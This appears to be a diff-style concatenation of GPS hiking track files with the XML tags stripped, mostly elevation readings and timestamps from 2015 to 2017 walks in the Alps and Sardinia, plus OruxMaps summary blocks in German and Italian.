+
+
+450.389
+2015-12-26T10:33:09Z
+
+
+449.621
+2015-12-26T10:34:25Z
+
+
+451.138
+2015-12-26T10:35:55Z
+
+
+459.906
+2015-12-26T10:37:18Z
+
+
+463.578
+2015-12-26T10:40:03Z
+
+
+474.286
+2015-12-26T10:42:37Z
+
+
+481.037
+2015-12-26T10:44:30Z
+
+
+502.312
+2015-12-26T10:48:10Z
+
+
+507.068
+2015-12-26T10:50:55Z
+
+
+505.054
+2015-12-26T10:52:44Z
+
+
+515.084
+2015-12-26T10:55:23Z
+
+
+517.587
+2015-12-26T10:56:47Z
+
+
+510.265
+2015-12-26T10:58:12Z
+
+
+500.696
+2015-12-26T10:59:32Z
+
+
+495.545
+2015-12-26T11:01:44Z
+
+
+496.312
+2015-12-26T11:02:22Z
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2017-01-01T20:40:36Z
+
+
+2017-01-01 09:11:12
+
+
+
+
+
+
+903.68
+2017-01-01T05:28:26Z
+
+
+902.55
+2017-01-01T05:28:52Z
+
+
+899.82
+2017-01-01T05:29:13Z
+
+
+897.19
+2017-01-01T05:31:11Z
+
+
+899.87
+2017-01-01T05:32:00Z
+
+
+904.83
+2017-01-01T05:32:43Z
+
+
+908.26
+2017-01-01T05:32:55Z
+
+
+917.88
+2017-01-01T05:33:41Z
+
+
+919.06
+2017-01-01T05:33:59Z
+
+
+927.0
+2017-01-01T05:34:42Z
+
+
+952.24
+2017-01-01T05:38:01Z
+
+
+967.38
+2017-01-01T05:39:05Z
+
+
+1010.81
+2017-01-01T05:42:09Z
+
+
+1038.33
+2017-01-01T05:44:09Z
+
+
+1071.67
+2017-01-01T05:47:10Z
+
+
+1099.77
+2017-01-01T05:50:10Z
+
+
+1109.29
+2017-01-01T05:50:54Z
+
+
+1118.92
+2017-01-01T05:51:46Z
+
+
+1126.36
+2017-01-01T05:52:21Z
+
+
+1160.83
+2017-01-01T05:54:58Z
+
+
+1165.54
+2017-01-01T05:55:27Z
+
+
+1186.87
+2017-01-01T05:56:59Z
+
+
+1194.79
+2017-01-01T05:57:41Z
+
+
+1195.33
+2017-01-01T06:03:18Z
+
+
+1207.74
+2017-01-01T06:04:15Z
+
+
+1220.73
+2017-01-01T06:05:45Z
+
+
+1227.87
+2017-01-01T06:11:07Z
+
+
+1232.03
+2017-01-01T06:11:25Z
+
+
+1243.29
+2017-01-01T06:12:27Z
+
+
+1257.67
+2017-01-01T06:13:09Z
+
+
+1267.64
+2017-01-01T06:13:49Z
+
+
+1292.83
+2017-01-01T06:16:30Z
+
+
+1314.37
+2017-01-01T06:18:26Z
+
+
+1306.05
+2017-01-01T06:19:38Z
+
+
+1305.42
+2017-01-01T06:21:37Z
+
+
+1311.54
+2017-01-01T07:05:11Z
+
+
+1318.36
+2017-01-01T07:16:24Z
+
+
+1301.84
+2017-01-01T07:18:00Z
+
+
+1309.57
+2017-01-01T07:19:58Z
+
+
+1281.63
+2017-01-01T07:42:47Z
+
+
+1254.89
+2017-01-01T07:44:33Z
+
+
+1214.84
+2017-01-01T07:46:28Z
+
+
+1185.1
+2017-01-01T07:48:09Z
+
+
+1147.86
+2017-01-01T07:50:39Z
+
+
+1144.23
+2017-01-01T07:52:05Z
+
+
+1124.99
+2017-01-01T07:53:30Z
+
+
+1111.21
+2017-01-01T07:54:15Z
+
+
+1104.1
+2017-01-01T07:54:37Z
+
+
+1093.69
+2017-01-01T07:55:11Z
+
+
+1086.19
+2017-01-01T07:55:35Z
+
+
+1083.62
+2017-01-01T07:55:45Z
+
+
+1071.82
+2017-01-01T07:56:25Z
+
+
+1054.98
+2017-01-01T07:57:40Z
+
+
+1045.52
+2017-01-01T07:58:22Z
+
+
+1026.29
+2017-01-01T07:59:35Z
+
+
+1023.45
+2017-01-01T07:59:44Z
+
+
+998.21
+2017-01-01T08:01:00Z
+
+
+955.56
+2017-01-01T08:03:16Z
+
+
+937.91
+2017-01-01T08:04:08Z
+
+
+912.77
+2017-01-01T08:05:38Z
+
+
+910.36
+2017-01-01T08:05:50Z
+
+
+900.63
+2017-01-01T08:06:21Z
+
+
+895.15
+2017-01-01T08:06:39Z
+
+
+892.27
+2017-01-01T08:07:12Z
+
+
+891.07
+2017-01-01T08:07:41Z
+
+
+894.72
+2017-01-01T08:09:36Z
+
+
+898.05
+2017-01-01T08:11:06Z
+ "
+"
+
+
+schlierewand
+
+
+
+
+
+OruxMaps
+2015-07-24T05:43:29Z
+
+
+schlierewand
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: schlierewand</h2><br /><p>Startzeit: 07/24/2015 07:43</p><p>Zielzeit: 07/24/2015 10:21</p><p>Strecke: 4,8km (02:37)</p><p>Bewegungszeit: 01:22</p><p>Ø-Geschwindigkeit: 1,8km/h</p><p>Netto-Geschwindigkeit: 3,5km/h</p><p>Max. Geschwindigkeit: 7,6km/h</p><p>Minimale Höhe: 1244m</p><p>Maximale Höhe: 2215m</p><p>Steig-Geschw.: 416,7m/h</p><p>Sink-Geschw.: -173,9m/h</p><p>Aufstieg: 979m</p><p>Abstieg: -35m</p><p>Steigzeit: 02:20</p><p>Sinkzeit: 00:12</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1250.84
+2015-07-24T05:43:31Z
+
+
+1255.1
+2015-07-24T05:48:57Z
+
+
+1266.34
+2015-07-24T05:51:52Z
+
+
+1275.99
+2015-07-24T05:53:11Z
+
+
+1277.99
+2015-07-24T05:53:46Z
+
+
+1271.62
+2015-07-24T05:54:25Z
+
+
+1266.95
+2015-07-24T05:55:06Z
+
+
+1276.37
+2015-07-24T05:56:14Z
+
+
+1279.73
+2015-07-24T05:56:35Z
+
+
+1286.39
+2015-07-24T05:57:17Z
+
+
+1301.11
+2015-07-24T05:58:30Z
+
+
+1306.0
+2015-07-24T06:00:10Z
+
+
+1307.44
+2015-07-24T06:01:29Z
+
+
+1306.71
+2015-07-24T06:02:48Z
+
+
+1318.37
+2015-07-24T06:04:55Z
+
+
+1325.25
+2015-07-24T06:05:42Z
+
+
+1329.75
+2015-07-24T06:06:37Z
+
+
+1321.39
+2015-07-24T06:07:24Z
+
+
+1333.92
+2015-07-24T06:08:16Z
+
+
+1339.87
+2015-07-24T06:09:06Z
+
+
+1333.89
+2015-07-24T06:09:36Z
+
+
+1378.86
+2015-07-24T06:10:37Z
+
+
+1368.62
+2015-07-24T06:10:38Z
+
+
+1341.97
+2015-07-24T06:12:16Z
+
+
+1428.35
+2015-07-24T06:21:17Z
+
+
+1452.89
+2015-07-24T06:25:51Z
+
+
+1503.5
+2015-07-24T06:31:44Z
+
+
+1521.87
+2015-07-24T06:33:54Z
+
+
+1553.75
+2015-07-24T06:37:41Z
+
+
+1563.37
+2015-07-24T06:38:41Z
+
+
+1580.77
+2015-07-24T06:41:05Z
+
+
+1613.74
+2015-07-24T06:45:13Z
+
+
+1621.51
+2015-07-24T06:46:03Z
+
+
+1631.93
+2015-07-24T06:48:35Z
+
+
+1678.84
+2015-07-24T06:54:50Z
+
+
+1680.34
+2015-07-24T06:55:58Z
+
+
+1701.83
+2015-07-24T06:58:42Z
+
+
+1719.87
+2015-07-24T07:00:31Z
+
+
+1725.4
+2015-07-24T07:01:37Z
+
+
+1744.03
+2015-07-24T07:04:40Z
+
+
+1749.86
+2015-07-24T07:05:30Z
+
+
+1766.46
+2015-07-24T07:07:59Z
+
+
+1819.11
+2015-07-24T07:15:59Z
+
+
+1822.12
+2015-07-24T07:16:57Z
+
+
+1863.6
+2015-07-24T07:23:16Z
+
+
+1862.0
+2015-07-24T07:24:58Z
+
+
+1874.82
+2015-07-24T07:25:51Z
+
+
+1935.37
+2015-07-24T07:34:19Z
+
+
+1946.37
+2015-07-24T07:36:36Z
+
+
+1956.84
+2015-07-24T07:37:57Z
+
+
+1973.76
+2015-07-24T07:40:21Z
+
+
+2028.27
+2015-07-24T07:46:44Z
+
+
+2065.5
+2015-07-24T07:53:06Z
+
+
+2088.62
+2015-07-24T07:57:58Z
+
+
+2139.88
+2015-07-24T08:07:02Z
+
+
+2158.24
+2015-07-24T08:12:21Z
+
+
+2209.27
+2015-07-24T08:20:13Z
+
+
+2215.87
+2015-07-24T08:21:03Z
+ "
+"
+
+
+
+
+
+
+
+Track 11.11.2015 - Rigi Hochflue
+
+
+
+1070.08
+
+
+1134.01
+
+
+1137.38
+
+
+1145.55
+
+
+1154.2
+
+
+1161.41
+
+
+1170.06
+
+
+1179.67
+
+
+1199.38
+
+
+1201.3
+
+
+1196.5
+
+
+1204.19
+
+
+1218.61
+
+
+1234.47
+
+
+1242.16
+
+
+1270.04
+
+
+1285.42
+
+
+1310.9
+
+
+1351.27
+
+
+1373.38
+
+
+1366.65
+
+
+1378.67
+
+
+1392.13
+
+
+1396.93
+
+
+1402.7
+
+
+1416.64
+
+
+1424.81
+
+
+1432.02
+
+
+1468.55
+
+
+1528.15
+
+
+1558.43
+
+
+1575.74
+
+
+1596.89
+
+
+1617.07
+
+
+1632.46
+
+
+1659.85
+
+
+1695.9
+
+
+1694.94
+
+
+1697.83
+
+
+1692.54
+
+
+1686.29
+
+
+1679.56
+
+
+1669.95
+
+
+1633.9
+
+
+1626.69
+
+
+1571.89
+
+
+1545.94
+
+
+1520.46
+
+
+1499.79
+
+
+1474.8
+
+
+1465.67
+
+
+1463.26
+
+
+1445.48
+
+
+1436.83
+
+
+1421.45
+
+
+1398.37
+
+
+1384.92
+
+
+1370.98
+
+
+1359.92
+
+
+1317.14
+
+
+1303.69
+
+
+1298.4
+
+
+1282.06
+
+
+1286.38
+
+
+1283.02
+
+
+1280.61
+
+
+1273.88
+
+
+1250.33
+
+
+1236.87
+
+
+1217.65
+
+
+1192.17
+
+
+1188.81
+
+
+1171.98
+
+
+1158.05
+
+
+1159.97
+
+
+1155.16
+
+
+1151.8
+
+
+1148.43
+
+
+1142.18
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-07-16T05:22:51Z
+
+2015-07-16 07:22:50
+
+
+
+
+
+
+1212.91
+2015-07-16T04:14:01Z
+
+
+1222.2
+2015-07-16T04:15:32Z
+
+
+1219.96
+2015-07-16T04:16:42Z
+
+
+1215.49
+2015-07-16T04:16:56Z
+
+
+1219.87
+2015-07-16T04:17:25Z
+
+
+1235.21
+2015-07-16T04:18:41Z
+
+
+1267.77
+2015-07-16T04:21:22Z
+
+
+1281.35
+2015-07-16T04:22:36Z
+
+
+1294.79
+2015-07-16T04:23:44Z
+
+
+1304.22
+2015-07-16T04:24:45Z
+
+
+1305.01
+2015-07-16T04:25:14Z
+
+
+1306.88
+2015-07-16T04:25:45Z
+
+
+1307.5
+2015-07-16T04:26:17Z
+
+
+1313.78
+2015-07-16T04:27:31Z
+
+
+1329.15
+2015-07-16T04:29:07Z
+
+
+1358.7
+2015-07-16T04:32:06Z
+
+
+1371.55
+2015-07-16T04:34:32Z
+
+
+1385.95
+2015-07-16T04:38:41Z
+
+
+1398.48
+2015-07-16T04:40:29Z
+
+
+1423.13
+2015-07-16T04:42:56Z
+
+
+1476.52
+2015-07-16T04:47:43Z
+
+
+1505.35
+2015-07-16T04:50:05Z
+
+
+1533.79
+2015-07-16T04:52:31Z
+
+
+1558.39
+2015-07-16T04:54:41Z
+
+
+1587.55
+2015-07-16T04:57:06Z
+
+
+1618.18
+2015-07-16T04:59:35Z
+
+
+1711.83
+2015-07-16T05:06:56Z
+
+
+1733.75
+2015-07-16T05:08:59Z
+
+
+1739.74
+2015-07-16T05:10:29Z
+
+
+1739.5
+2015-07-16T05:13:12Z
+
+
+1741.7
+2015-07-16T05:14:31Z
+
+
+1743.8
+2015-07-16T05:15:53Z
+
+
+1748.59
+2015-07-16T05:22:49Z
+ "
+"
+
+
+
+
+
+
+CompeGPS TEAM, SL
+2015-05-27T18:03:52Z
+
+
+Zermatt Täsch
+
+
+
+1620.9
+2015-05-25T11:02:00Z
+
+
+1540.2
+2015-05-25T11:05:49Z
+
+
+1550.7
+2015-05-25T11:06:34Z
+
+
+1565.2
+2015-05-25T11:07:03Z
+
+
+1557.9
+2015-05-25T11:07:16Z
+
+
+1563.7
+2015-05-25T11:08:18Z
+
+
+1601.2
+2015-05-25T11:11:29Z
+
+
+1607.5
+2015-05-25T11:12:37Z
+
+
+1610.3
+2015-05-25T11:15:25Z
+
+
+1617.6
+2015-05-25T11:17:25Z
+
+
+1617.6
+2015-05-25T11:17:38Z
+
+
+1620.4
+2015-05-25T11:18:35Z
+
+
+1623.8
+2015-05-25T11:19:55Z
+
+
+1619.5
+2015-05-25T11:21:12Z
+
+
+1612.8
+2015-05-25T11:25:38Z
+
+
+1607.0
+2015-05-25T11:27:01Z
+
+
+1600.7
+2015-05-25T11:27:38Z
+
+
+1595.9
+2015-05-25T11:28:08Z
+
+
+1555.1
+2015-05-25T11:28:42Z
+
+
+1571.4
+2015-05-25T11:30:14Z
+
+
+1573.3
+2015-05-25T11:31:22Z
+
+
+1582.0
+2015-05-25T11:34:09Z
+
+
+1568.1
+2015-05-25T11:36:31Z
+
+
+1566.1
+2015-05-25T11:38:06Z
+
+
+1570.9
+2015-05-25T11:39:54Z
+
+
+1565.2
+2015-05-25T11:42:34Z
+
+
+1558.4
+2015-05-25T11:44:23Z
+
+
+1544.0
+2015-05-25T11:45:43Z
+
+
+1546.9
+2015-05-25T11:49:25Z
+
+
+1550.3
+2015-05-25T11:50:32Z
+
+
+1555.1
+2015-05-25T11:52:57Z
+
+
+1548.3
+2015-05-25T11:54:54Z
+
+
+1547.9
+2015-05-25T11:56:34Z
+
+
+1541.6
+2015-05-25T11:58:34Z
+
+
+1517.1
+2015-05-25T12:01:13Z
+
+
+1524.8
+2015-05-25T12:07:11Z
+
+
+1498.8
+2015-05-25T12:09:17Z
+
+
+1484.9
+2015-05-25T12:12:55Z
+
+
+1472.9
+2015-05-25T12:14:52Z
+
+
+1465.7
+2015-05-25T12:16:37Z
+
+
+1459.4
+2015-05-25T12:17:59Z
+
+
+1447.4
+2015-05-25T12:18:43Z
+
+
+1450.8
+2015-05-25T12:20:42Z
+
+
+1428.2
+2015-05-25T12:23:02Z
+
+
+1443.6
+2015-05-25T12:38:02Z
+
+
+1466.2
+2015-05-25T12:42:03Z
+
+
+1461.8
+2015-05-25T12:44:28Z
+
+
+1462.3
+2015-05-25T12:47:05Z
+
+
+1456.5
+2015-05-25T12:49:28Z
+
+
+1453.7
+2015-05-25T12:50:07Z
+
+
+1454.6
+2015-05-25T12:50:58Z
+
+
+1459.4
+2015-05-25T12:52:42Z
+
+
+1439.2
+2015-05-25T13:05:29Z
+
+
+1435.4
+2015-05-25T13:07:02Z
+
+
+1436.8
+2015-05-25T13:07:45Z
+
+
+1423.4
+2015-05-25T13:08:46Z
+
+
+1449.3
+2015-05-25T13:12:32Z
+
+
+1438.3
+2015-05-25T13:13:05Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-03-23T13:34:03Z
+
+2015-03-23 14:34:01
+
+
+
+
+
+
+799.57
+2015-03-23T11:38:18Z
+
+
+800.96
+2015-03-23T11:42:34Z
+
+
+801.29
+2015-03-23T11:43:37Z
+
+
+800.77
+2015-03-23T11:44:31Z
+
+
+802.7
+2015-03-23T11:45:51Z
+
+
+830.07
+2015-03-23T11:48:33Z
+
+
+839.14
+2015-03-23T11:50:59Z
+
+
+867.65
+2015-03-23T11:53:31Z
+
+
+883.14
+2015-03-23T11:55:09Z
+
+
+883.26
+2015-03-23T11:55:26Z
+
+
+884.92
+2015-03-23T11:56:01Z
+
+
+893.86
+2015-03-23T11:56:54Z
+
+
+925.42
+2015-03-23T11:59:17Z
+
+
+935.86
+2015-03-23T12:00:06Z
+
+
+942.03
+2015-03-23T12:00:33Z
+
+
+960.52
+2015-03-23T12:01:44Z
+
+
+970.14
+2015-03-23T12:31:30Z
+
+
+960.0
+2015-03-23T12:33:23Z
+
+
+955.34
+2015-03-23T12:33:45Z
+
+
+943.23
+2015-03-23T12:34:39Z
+
+
+924.97
+2015-03-23T12:36:11Z
+
+
+922.32
+2015-03-23T12:36:54Z
+
+
+913.79
+2015-03-23T12:37:38Z
+
+
+910.67
+2015-03-23T12:38:14Z
+
+
+928.81
+2015-03-23T12:39:23Z
+
+
+947.21
+2015-03-23T12:40:49Z
+
+
+1001.11
+2015-03-23T12:48:11Z
+
+
+1012.29
+2015-03-23T12:49:08Z
+
+
+1012.02
+2015-03-23T12:58:13Z
+
+
+978.43
+2015-03-23T13:02:09Z
+
+
+982.68
+2015-03-23T13:07:01Z
+
+
+960.78
+2015-03-23T13:10:30Z
+
+
+958.52
+2015-03-23T13:11:01Z
+
+
+957.67
+2015-03-23T13:11:39Z
+
+
+966.64
+2015-03-23T13:12:24Z
+
+
+926.47
+2015-03-23T13:16:08Z
+
+
+923.71
+2015-03-23T13:17:07Z
+
+
+909.92
+2015-03-23T13:18:23Z
+
+
+900.33
+2015-03-23T13:19:55Z
+
+
+885.41
+2015-03-23T13:20:53Z
+
+
+883.32
+2015-03-23T13:22:52Z
+
+
+871.76
+2015-03-23T13:24:12Z
+
+
+860.79
+2015-03-23T13:24:56Z
+
+
+856.26
+2015-03-23T13:25:27Z
+
+
+856.8
+2015-03-23T13:26:35Z
+
+
+860.58
+2015-03-23T13:28:25Z
+
+
+861.36
+2015-03-23T13:28:48Z
+
+
+828.21
+2015-03-23T13:31:53Z
+
+
+813.56
+2015-03-23T13:33:25Z
+
+
+812.81
+2015-03-23T13:33:48Z
+ "
+"
+
+
+2016-01-09 20:32
+
+
+
+
+
+OruxMaps
+2016-01-09T19:32:01Z
+
+
+2016-01-09 20:32
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Nome: 2016-01-09 20:32</h2><br /><p>Orario inizio: 01/09/2016 20:32</p><p>Orario fine: 01/09/2016 21:58</p><p>Distanza: 3,8km (01:26)</p><p>Tempo movimento: 01:00</p><p>Velocità media: 2,6km/h</p><p>Velocità media mov.: 3,8km/h</p><p>Max. Velocità: 22,9km/h</p><p>Altitudine minima: 1527m</p><p>Altitudine massima: 1698m</p><p>Velocità di salita: 253,5m/h</p><p>Velocità di discesa: -367m/h</p><p>Dislivello positivo: 195m</p><p>Perdita di elevazione: -209m</p><p>Tempo di salita: 00:46</p><p>Tempo di discesa: 00:34</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Non definito
+
+
+
+
+
+1541.8
+2016-01-09T19:32:04Z
+
+
+1546.25
+2016-01-09T19:32:07Z
+
+
+1535.85
+2016-01-09T19:32:56Z
+
+
+1543.5
+2016-01-09T19:34:48Z
+
+
+1548.56
+2016-01-09T19:36:06Z
+
+
+1549.09
+2016-01-09T19:38:20Z
+
+
+1573.13
+2016-01-09T19:41:37Z
+
+
+1576.32
+2016-01-09T19:43:51Z
+
+
+1583.33
+2016-01-09T19:45:11Z
+
+
+1586.5
+2016-01-09T19:47:56Z
+
+
+1613.2
+2016-01-09T19:53:46Z
+
+
+1609.9
+2016-01-09T19:54:11Z
+
+
+1623.51
+2016-01-09T19:58:59Z
+
+
+1629.71
+2016-01-09T20:05:49Z
+
+
+1640.65
+2016-01-09T20:10:12Z
+
+
+1645.19
+2016-01-09T20:10:32Z
+
+
+1671.2
+2016-01-09T20:15:02Z
+
+
+1648.86
+2016-01-09T20:15:27Z
+
+
+1661.2
+2016-01-09T20:17:15Z
+
+
+1663.89
+2016-01-09T20:23:47Z
+
+
+1672.46
+2016-01-09T20:29:51Z
+
+
+1681.78
+2016-01-09T20:31:57Z
+
+
+1698.6
+2016-01-09T20:33:33Z
+
+
+1675.01
+2016-01-09T20:34:31Z
+
+
+1683.07
+2016-01-09T20:35:15Z
+
+
+1681.21
+2016-01-09T20:35:37Z
+
+
+1645.68
+2016-01-09T20:42:24Z
+
+
+1624.55
+2016-01-09T20:48:05Z
+
+
+1611.9
+2016-01-09T20:50:42Z
+
+
+1591.79
+2016-01-09T20:53:20Z
+
+
+1585.66
+2016-01-09T20:54:51Z
+
+
+1579.16
+2016-01-09T20:54:57Z
+
+
+1566.51
+2016-01-09T20:55:39Z
+
+
+1557.57
+2016-01-09T20:56:15Z
+
+
+1537.97
+2016-01-09T20:58:07Z
+
+
+1527.21
+2016-01-09T20:58:34Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-10-01T11:27:02Z
+
+01-OKT-16 13:26:58
+
+
+
+
+
+1857.4
+2016-10-01T07:10:41Z
+
+
+1898.26
+2016-10-01T07:12:37Z
+
+
+1897.3
+2016-10-01T07:14:56Z
+
+
+1898.26
+2016-10-01T07:16:09Z
+
+
+1898.74
+2016-10-01T07:18:40Z
+
+
+1898.74
+2016-10-01T07:19:49Z
+
+
+1897.78
+2016-10-01T07:20:59Z
+
+
+1899.22
+2016-10-01T07:22:16Z
+
+
+1899.7
+2016-10-01T07:23:28Z
+
+
+1915.08
+2016-10-01T07:27:10Z
+
+
+1920.85
+2016-10-01T07:29:50Z
+
+
+1914.12
+2016-10-01T07:32:14Z
+
+
+1907.87
+2016-10-01T07:33:24Z
+
+
+1899.22
+2016-10-01T07:34:33Z
+
+
+1899.22
+2016-10-01T07:35:45Z
+
+
+1917.01
+2016-10-01T07:44:19Z
+
+
+1919.41
+2016-10-01T07:46:52Z
+
+
+1942.48
+2016-10-01T07:50:31Z
+
+
+1969.88
+2016-10-01T07:57:08Z
+
+
+1968.92
+2016-10-01T07:59:03Z
+
+
+2022.75
+2016-10-01T08:08:04Z
+
+
+2084.76
+2016-10-01T08:15:39Z
+
+
+2121.77
+2016-10-01T08:19:25Z
+
+
+2209.25
+2016-10-01T08:32:24Z
+
+
+2252.51
+2016-10-01T08:37:12Z
+
+
+2294.8
+2016-10-01T08:41:31Z
+
+
+2312.11
+2016-10-01T08:47:15Z
+
+
+2329.89
+2016-10-01T08:49:58Z
+
+
+2359.69
+2016-10-01T08:57:09Z
+
+
+2399.59
+2016-10-01T09:03:01Z
+
+
+2441.89
+2016-10-01T09:08:20Z
+
+
+2461.11
+2016-10-01T09:10:41Z
+
+
+2469.28
+2016-10-01T10:08:56Z
+
+
+2455.34
+2016-10-01T10:11:20Z
+
+
+2423.14
+2016-10-01T10:13:34Z
+
+
+2392.38
+2016-10-01T10:15:33Z
+
+
+2364.5
+2016-10-01T10:19:30Z
+
+
+2317.88
+2016-10-01T10:23:34Z
+
+
+2263.08
+2016-10-01T10:29:43Z
+
+
+2247.22
+2016-10-01T10:31:47Z
+
+
+2238.09
+2016-10-01T10:38:01Z
+
+
+2204.92
+2016-10-01T10:40:04Z
+
+
+2151.09
+2016-10-01T10:43:55Z
+
+
+2079.95
+2016-10-01T10:48:40Z
+
+
+2026.6
+2016-10-01T10:52:36Z
+
+
+2001.6
+2016-10-01T10:54:52Z
+
+
+1989.1
+2016-10-01T10:55:57Z
+
+
+1974.69
+2016-10-01T10:57:04Z
+
+
+1966.99
+2016-10-01T10:59:21Z
+
+
+1968.44
+2016-10-01T11:00:26Z
+
+
+1973.72
+2016-10-01T11:03:35Z
+
+
+1947.29
+2016-10-01T11:06:01Z
+
+
+1920.85
+2016-10-01T11:08:37Z
+
+
+1920.85
+2016-10-01T11:10:54Z
+
+
+1914.12
+2016-10-01T11:12:58Z
+
+
+1917.01
+2016-10-01T11:13:57Z
+
+
+1917.01
+2016-10-01T11:16:15Z
+
+
+1895.38
+2016-10-01T11:19:26Z
+
+
+1892.49
+2016-10-01T11:20:21Z
+
+
+1892.01
+2016-10-01T11:21:25Z
+
+
+1895.86
+2016-10-01T11:22:29Z
+
+
+1905.47
+2016-10-01T11:23:55Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2017-01-08T14:40:48Z
+
+
+2017-01-08 13:12:01
+
+
+
+
+
+
+
+
+572.62
+2017-01-08T11:50:13Z
+
+
+574.14
+2017-01-08T11:52:28Z
+
+
+579.98
+2017-01-08T11:53:12Z
+
+
+586.08
+2017-01-08T11:55:07Z
+
+
+585.81
+2017-01-08T11:55:20Z
+
+
+584.96
+2017-01-08T11:55:56Z
+
+
+576.87
+2017-01-08T11:57:35Z
+
+
+581.76
+2017-01-08T12:00:57Z
+
+
+579.32
+2017-01-08T12:05:18Z
+
+
+580.91
+2017-01-08T12:06:21Z
+
+
+579.57
+2017-01-08T12:08:02Z
+
+
+568.52
+2017-01-08T12:09:10Z
+
+
+557.35
+2017-01-08T12:11:14Z
+
+
+555.58
+2017-01-08T12:11:32Z
+
+
+538.07
+2017-01-08T12:11:58Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-03-15T21:06:28Z
+
+
+Aktueller Track: 15 MRZ 2015 10:00
+
+
+
+
+
+
+734.58
+2015-03-15T09:00:24Z
+
+
+686.39453125
+
+
+686.0546875
+
+
+685.734375
+
+
+685.328125
+
+
+718.72
+2015-03-15T09:09:47Z
+
+
+717.76
+2015-03-15T09:11:03Z
+
+
+706.23
+2015-03-15T09:16:16Z
+
+
+702.38
+2015-03-15T09:18:19Z
+
+
+694.69
+2015-03-15T09:21:32Z
+
+
+687.0
+2015-03-15T09:24:35Z
+
+
+672.58
+2015-03-15T09:28:40Z
+
+
+666.81
+2015-03-15T09:30:45Z
+
+
+662.01
+2015-03-15T09:33:19Z
+
+
+661.04
+2015-03-15T09:34:29Z
+
+
+659.12
+2015-03-15T09:38:18Z
+
+
+656.72
+2015-03-15T09:41:48Z
+
+
+656.24
+2015-03-15T09:44:32Z
+
+
+652.87
+2015-03-15T09:49:32Z
+
+
+652.87
+2015-03-15T09:51:22Z
+
+
+658.16
+2015-03-15T09:53:40Z
+
+
+652.87
+2015-03-15T09:57:26Z
+
+
+649.99
+2015-03-15T10:02:11Z
+
+
+650.47
+2015-03-15T10:02:21Z
+
+
+648.07
+2015-03-15T10:06:34Z
+
+
+647.1
+2015-03-15T10:08:36Z
+
+
+646.14
+2015-03-15T10:11:25Z
+
+
+646.62
+2015-03-15T10:11:59Z
+
+
+646.14
+2015-03-15T10:12:48Z
+
+
+646.62
+2015-03-15T10:13:04Z
+
+
+643.74
+2015-03-15T10:14:36Z
+
+
+648.55
+2015-03-15T10:18:48Z
+
+
+649.03
+2015-03-15T10:20:01Z
+
+
+649.03
+2015-03-15T10:20:25Z
+
+
+649.99
+2015-03-15T10:21:48Z
+
+
+650.47
+2015-03-15T10:23:18Z
+
+
+650.95
+2015-03-15T10:25:13Z
+
+
+650.95
+2015-03-15T10:28:04Z
+
+
+651.91
+2015-03-15T10:28:23Z
+
+
+652.87
+2015-03-15T10:30:01Z
+
+
+653.83
+2015-03-15T10:31:57Z
+
+
+653.35
+2015-03-15T10:32:52Z
+
+
+655.28
+2015-03-15T10:36:20Z
+
+
+654.8
+2015-03-15T10:39:09Z
+
+
+672.58
+2015-03-15T10:41:46Z
+
+
+678.35
+2015-03-15T10:43:37Z
+
+
+667.29
+2015-03-15T10:46:05Z
+
+
+659.6
+2015-03-15T10:49:00Z
+
+
+663.93
+2015-03-15T10:50:55Z
+
+
+661.52
+2015-03-15T10:51:43Z
+
+
+662.97
+2015-03-15T10:57:12Z
+
+
+659.12
+2015-03-15T11:00:26Z
+
+
+662.97
+2015-03-15T11:01:14Z
+
+
+668.25
+2015-03-15T11:01:50Z
+
+
+673.06
+2015-03-15T11:03:39Z
+
+
+673.54
+2015-03-15T11:04:00Z
+
+
+675.46
+2015-03-15T11:04:48Z
+
+
+676.91
+2015-03-15T11:06:00Z
+
+
+678.83
+2015-03-15T11:06:45Z
+
+
+683.63
+2015-03-15T11:08:41Z
+
+
+683.63
+2015-03-15T11:11:12Z
+
+
+677.91796875
+
+
+677.25
+
+
+685.34375
+
+
+686.40234375
+
+
+686.390625
+
+
+681.71
+2015-03-15T11:11:47Z
+ "
+"
+
+
+
+
+
+
+
+Cala Goloritzè
+15 mai 2015 1:09 pm
+
+
+
+121.472
+2015-05-15T11:09:57Z
+
+
+123.308
+2015-05-15T11:10:25Z
+
+
+149.121
+2015-05-15T11:11:35Z
+
+
+158.927
+2015-05-15T11:12:25Z
+
+
+226.708
+2015-05-15T11:18:57Z
+
+
+241.317
+2015-05-15T11:20:58Z
+
+
+249.972
+2015-05-15T11:23:24Z
+
+
+258.828
+2015-05-15T11:25:03Z
+
+
+265.879
+2015-05-15T11:25:34Z
+
+
+278.444
+2015-05-15T11:28:10Z
+
+
+291.421
+2015-05-15T11:30:04Z
+
+
+300.929
+2015-05-15T11:31:06Z
+
+
+315.805
+2015-05-15T11:32:58Z
+
+
+357.571
+2015-05-15T11:38:47Z
+
+
+391.075
+2015-05-15T11:41:04Z
+
+
+401.273
+2015-05-15T11:42:29Z
+
+
+416.499
+2015-05-15T11:44:35Z
+
+
+430.715
+2015-05-15T11:46:17Z
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-09-19T09:46:21Z
+
+
+150917-kanzelsteig-3000m-365HM
+
+
+
+
+
+
+732.0
+2010-01-01T00:00:00Z
+
+
+729.0
+2010-01-01T00:00:07Z
+
+
+747.0
